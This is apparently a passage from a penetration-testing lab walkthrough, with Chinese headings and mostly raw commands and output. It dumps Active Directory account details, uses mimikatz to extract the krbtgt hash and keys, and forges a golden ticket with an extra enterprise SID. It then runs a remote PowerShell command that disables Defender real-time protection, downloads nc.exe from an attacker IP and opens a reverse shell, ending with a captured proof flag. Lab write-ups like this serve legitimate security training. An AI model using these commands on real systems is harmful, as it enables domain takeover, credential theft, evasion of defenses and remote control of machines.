distinguishedname : CN=Pete,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Pete
lastlogontimestamp : 8/1/2022 2:07:06 AM
userprincipalname : [email protected]
name : Pete
objectsid : S-1-5-21-2032401531-514583578-4118054891-1104
samaccountname : pete
admincount : 1
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Pete
whenchanged : 8/1/2022 9:07:06 AM
instancetype : 4
usncreated : 13078
objectguid : 8340879d-f78e-48e3-95ad-4e8bb7882379
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : {7/15/2020 9:58:48 PM, 1/1/1601 12:00:00 AM}
givenname : Pete
memberof : CN=Domain Admins,CN=Users,DC=ops,DC=comply,DC=com
lastlogon : 8/1/2022 2:27:46 AM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/15/2020 9:18:26 PM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 2:18:26 PM
usnchanged : 69944
logoncount : 4
badpasswordtime : 12/31/1600 4:00:00 PM
distinguishedname : CN=Nina,OU=OpsAdmins,OU=OpsUsers,DC=ops,DC=comply,DC=com
objectclass : {top, person, organizationalPerson, user}
displayname : Nina
lastlogontimestamp : 7/15/2020 11:49:19 PM
userprincipalname : [email protected]
name : Nina
objectsid : S-1-5-21-2032401531-514583578-4118054891-1109
samaccountname : nina
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
cn : Nina
whenchanged : 7/16/2020 6:49:19 AM
instancetype : 4
usncreated : 13717
objectguid : 627efa6d-1a04-45fb-aea9-614aa0f6c786
lastlogoff : 12/31/1600 4:00:00 PM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=comply,DC=com
dscorepropagationdata : 1/1/1601 12:00:00 AM
givenname : Nina
memberof : CN=FileAdmin,OU=OpsGroups,DC=ops,DC=comply,DC=com
lastlogon : 7/15/2020 11:51:58 PM
badpwdcount : 0
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 7/16/2020 6:48:28 AM
countrycode : 0
primarygroupid : 513
pwdlastset : 7/15/2020 11:48:28 PM
usnchanged : 13726
获取krbtgt的hash:
PS C:\\Users\\Administrator\\Desktop> .\\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit"
.\\mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::lsa /inject /name:krbtgt
Domain : OPS / S-1-5-21-2032401531-514583578-4118054891
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 7c7865e6e30e54e8845aad091b0ff447
LM :
Hash NTLM: **7c7865e6e30e54e8845aad091b0ff447**
ntlm- 0: 7c7865e6e30e54e8845aad091b0ff447
lm - 0: b3c43eb3ee288bab2606504b11e7fe3a
* WDigest
01 60a0f85bc3f31b5e309437af2a09fc13
02 caadca3361c142d2773b59dbe3e19c14
03 86af88abd61bbfd57d5cfacec37ffd8a
04 60a0f85bc3f31b5e309437af2a09fc13
05 caadca3361c142d2773b59dbe3e19c14
06 60dabc72a9d9ad6fb16fed4b2c037a25
07 60a0f85bc3f31b5e309437af2a09fc13
08 4700de09cb02a0157bb372c0b8e692dc
09 4700de09cb02a0157bb372c0b8e692dc
10 0c22fa55fdaeffff367cbce7ef1b7ae1
11 e325eeb5a8884e0fa1d2d1ab29d8d4ad
12 4700de09cb02a0157bb372c0b8e692dc
13 6cebe8075552f60c278106b5a4d5b284
14 e325eeb5a8884e0fa1d2d1ab29d8d4ad
15 33ce538ef442946bf9fc87ff46371700
16 33ce538ef442946bf9fc87ff46371700
17 f4a1962707dc02fb6197a3f8797970d7
18 67e965b3fcac8d9c3312086ef1acaad3
19 eb7a8c04ec0db4cf9ef4db3f1c8f5857
20 ca90e8a8c82ebc7a6f18c4040ecde53d
21 2f0d2b24b2aff373c99d7409609c03be
22 2f0d2b24b2aff373c99d7409609c03be
23 1fcf70fb175f4ee2e992e5b332281c4b
24 a7bf0771b58b1a7d330259223e3b7a11
25 a7bf0771b58b1a7d330259223e3b7a11
26 1a2e6d4094b31c6a47665ce62d69476b
27 fbe6418f215c4c7b7f70674b82424fe9
28 ce38c26963fb49f5dfbdad1d7c189057
29 e120df5deaa8d2e09924947a7967d482
* Kerberos
Default Salt : OPS.COMPLY.COMkrbtgt
Credentials
des_cbc_md5 : a2328f76b008b3e3
* Kerberos-Newer-Keys
Default Salt : OPS.COMPLY.COMkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 5835db0b31ca0cedd2ffcde55be50e1ca2c7934cdf9e1105c8b4ecdc3a4301df
aes128_hmac (4096) : 85e4044712bbaf5e98c5c31e1d05812d
des_cbc_md5 (4096) : a2328f76b008b3e3
* NTLM-Strong-NTOWF
Random Value : be0cca4f4c3aaec5e2ef0596e93f1da8
mimikatz(commandline) # exit
Bye!
金票:
PS C:\\Users\\Administrator\\Desktop> **.\\mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.comply.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"**
.\\mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.comply.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:ops.comply.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt
User : Administrator
Domain : ops.comply.com (OPS)
SID : S-1-5-21-2032401531-514583578-4118054891
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-1135011135-3178090508-3151492220-519 ;
ServiceKey: 7c7865e6e30e54e8845aad091b0ff447 - rc4_hmac_nt
Lifetime : 8/1/2022 2:49:20 AM ; 7/29/2032 2:49:20 AM ; 7/29/2032 2:49:20 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ ops.comply.com' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
PS C:\\Users\\Administrator\\Desktop> dir \\\\rdc02.comply.com\\c$
dir \\\\rdc02.comply.com\\c$
Directory: \\\\rdc02.comply.com\\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 7/15/2020 12:48 PM PerfLogs
d-r--- 7/15/2020 5:44 PM Program Files
d----- 7/15/2020 5:30 PM Program Files (x86)
d-r--- 7/15/2020 5:30 PM Users
d----- 9/21/2020 5:47 AM Windows
反弹nc:
PS C:\\Users\\Administrator\\Desktop> Invoke-Command -computername rdc02.comply.com -scriptblock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose;iwr -uri <http://192.168.49.64/nc.exe> -o c:\\windows\\tasks\\nc.exe;c:\\windows\\tasks\\nc.exe 192.168.49.64 443 -e cmd.exe }
Invoke-Command -computername rdc02.comply.com -scriptblock {Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose;iwr -uri <http://192.168.49.64/nc.exe> -o c:\\windows\\tasks\\nc.exe;c:\\windows\\tasks\\nc.exe 192.168.49.64 443 -e cmd.exe }
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.169] 63177
Microsoft Windows [Version 10.0.17763.1397]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Users\\Administrator.OPS\\Documents>hostname
hostname
rdc02
C:\\Users\\Administrator.OPS\\Documents>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.64.160
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.64.254
C:\\Users\\Administrator.OPS\\Documents>whoami
whoami
ops\\administrator
C:\\Users\\Administrator.OPS\\Desktop>cd c:\\Users\\Administrator\\Desktop\\
cd c:\\Users\\Administrator\\Desktop\\
c:\\Users\\Administrator\\Desktop>type proof.txt
type proof.txt
**b03dc83d19a4535dd27dec84910d8b3f**
c:\\Users\\Administrator\\Desktop>